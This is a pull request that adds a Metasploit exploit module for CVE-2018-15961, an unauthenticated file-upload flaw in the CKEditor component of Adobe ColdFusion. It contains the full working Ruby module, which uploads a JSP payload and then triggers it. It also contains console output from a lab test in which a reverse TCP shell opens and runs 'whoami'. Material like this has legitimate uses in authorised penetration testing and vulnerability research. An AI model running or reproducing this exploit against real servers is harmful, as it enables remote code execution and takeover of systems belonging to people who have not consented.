### PR TITLE
Add CVE-2018-15961 Adobe ColdFusion CKEditor unrestricted file upload

### DIFF
--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'      =>
         [
           [ "CVE", "2018-15961" ],
+          [ "BID", "105314" ],
           [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
         ],
       'Privileged'      => false,
@@ -59,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
       'DefaultTarget'   => 0,
-      'DisclosureDate'  => '11 septembre 2018'
+      'DisclosureDate'  => 'Sep 11 2018'
     ))
 
     register_options(

--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Adobe ColdFusion CKEditor unrestricted file upload',
+      'Description'     => %q{
+        A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
+        (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
+        ColdFusion 2018 (July 12 release) allows unauthenticated remote
+        attackers to upload and execute JSP files through the filemanager
+        plugin.
+        Tested on Adobe ColdFusion 2018.
+      },
+      'Author'          =>
+        [
+          'Pete Freitag de Foundeo', # Vulnerability discovery
+          'Vahagn vah_13 Vardanian', # First public PoC
+          'Qazeer' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ "CVE", "2018-15961" ],
+          [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
+        ],
+      'Privileged'      => false,
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Platform'        => ['win', 'linux'],
+      'Targets'        =>
+        [
+          [ 'Universal Linux Target',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'linux',
+              'Payload'  =>
+                {
+                  'DisableNops' => true,
+                },
+            }
+          ],
+          [ 'Universal Windows Target',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'win',
+              'Payload'  =>
+                {
+                  'DisableNops' => true,
+                },
+            }
+          ],
+        ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => '11 septembre 2018'
+    ))
+
+    register_options(
+      [
+        OptString.new('CKEDITOR_DIR', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
+      ])
+  end
+
+  def exploit
+
+    filename = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
+
+    print_status("Uploading the JSP payload at #{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}...")
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    mime.add_part("path", "text/plain", nil, "form-data; name=\"path\"")
+
+    post_str = mime.to_s
+    post_str.strip!
+
+    res = send_request_cgi(
+      {
+        'uri'		=> normalize_uri(datastore['CKEDITOR_DIR'], "plugins", "filemanager", "upload.cfm"),
+        'version'	=> '1.1',
+        'method'	=> 'POST',
+        'ctype'		=> 'multipart/form-data; boundary=' + mime.bound,
+        'data'		=> post_str,
+      })
+
+    if (res and res.code == 200)
+      print_good("Upload succeeded! Executing payload...")
+
+      send_request_raw(
+        {
+          'uri'		=> "#{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}",
+          'method'	=> 'GET',
+        }, 5)
+
+      handler
+    else
+      print_error("Upload Failed...")
+      return
+    end
+  end
+end


### PR DESCRIPTION
Hello everyone,

This module exploit the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerabilty goes by CVE-2018-15961.

The exploitation is pretty basic, a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

### Output

msf > use exploit/multi/http/coldfusion_ckeditor_file_upload 
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

### Verification

msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload  set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

### TODO
Should be working on Windows and Adobe 2016 as the URL used do not change but not tested.